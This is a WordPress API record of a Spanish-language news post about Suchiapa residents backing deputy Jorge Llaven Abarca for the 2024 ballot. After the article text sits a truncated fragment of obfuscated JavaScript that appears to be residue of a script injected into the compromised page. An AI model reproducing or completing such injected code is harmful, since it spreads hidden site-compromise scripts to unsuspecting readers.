{"id":11943,"date":"2023-09-25T01:53:03","date_gmt":"2023-09-25T01:53:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11943"},"modified":"2023-09-25T01:56:58","modified_gmt":"2023-09-25T01:56:58","slug":"en-su-natal-suchiapa-miles-piden-que-llaven-abarca-participe-en-2024","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11943","title":{"rendered":"En su natal Suchiapa miles piden que Llaven Abarca participe en 2024\u00a0"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/LLAVEN-1.jpg\" alt=\"\" class=\"wp-image-11946\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/LLAVEN-1.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/LLAVEN-1-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/LLAVEN-1-768x512.jpg 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>&nbsp;\u2022 En compa\u00f1\u00eda de sus paisanos, el pol\u00edtico chiapaneco reafirm\u00f3 estar listo y preparado para aparecer en la boleta el pr\u00f3ximo a\u00f1o&nbsp;<\/p>\n\n\n\n<p>&nbsp;24 de septiembre del 2023. Tuxtla Guti\u00e9rrez, Chiapas.- Con gritos al un\u00edsono de \u00a1s\u00ed se puede, s\u00ed se puede!, m\u00e1s de dos mil hombres y mujeres del municipio de Suchiapa refrendaron este domingo su apoyo total a su paisano el diputado federal Jorge Llaven Abarca para que aparezca en la boleta el pr\u00f3ximo a\u00f1o.&nbsp;<\/p>\n\n\n\n<p>Llaven Abarca, acompa\u00f1ado de su esposa y presidenta del voluntariado \u201cSiempre al lado de la gente\u201d, Lupita G\u00f3mez Casanova, recorri\u00f3 las calles de su pueblo, saludando a amigos, amigas y vecinos, con quienes se comprometi\u00f3 a entregar su vida a Chiapas.<\/p>\n\n\n\n<p>&nbsp;\u201cEmpezamos a construir juntos hace a\u00f1os, pero hoy hice ante mi pueblo el compromiso m\u00e1s importante de mi vida; escucharlos gritar s\u00ed se puede me motiva a trabajar cada d\u00eda m\u00e1s fuerte para tener un Chiapas mejor, continuaremos caminando juntos porque la transformaci\u00f3n tambi\u00e9n es verde\u201d, declar\u00f3.&nbsp;<\/p>\n\n\n\n<p>Por \u00faltimo, el legislador suchiapaneco detall\u00f3 que el movimiento transformador tiene como prioridad el bienestar de los que menos tienen: \u201cgracias a mis paisanos y paisanas que hoy me acompa\u00f1aron a caminar en las calles de mi natal Suchiapa, todos vamos a defender los verdaderos intereses de las y los chiapanecos\u201d.&nbsp;<\/p>\n\n\n\n<p>Acompa\u00f1aron a Llaven Abarca la diputada federal Valeria Santiago Barrientos, la diputada local Floralma G\u00f3mez S\u00e1ntiz, Carlos Molano Robles, coordinador del PVEM en Tuxtla Guti\u00e9rrez, as\u00ed como Marco Antonio Esquivel G\u00f3mez, l\u00edder de la Confederaci\u00f3n Nacional de Campo y para el Campo, entre otros liderazgos.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>&nbsp;\u2022 En compa\u00f1\u00eda de sus paisanos, el pol\u00edtico chiapaneco reafirm\u00f3 estar listo y preparado para aparecer en la boleta el pr\u00f3ximo a\u00f1o&nbsp; &nbsp;24 de septiembre del 2023. Tuxtla Guti\u00e9rrez, Chiapas.- Con gritos al un\u00edsono de \u00a1s\u00ed se puede, s\u00ed se puede!, m\u00e1s de dos mil hombres y mujeres del municipio de Suchiapa refrendaron este domingo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11944,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-11943","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11943","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11943"}],"version-history":[{"count":2,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11943\/revisions"}],"predecessor-version":[{"id":11947,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11943\/revisions\/11947"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11944"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11943"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11943"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11943"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}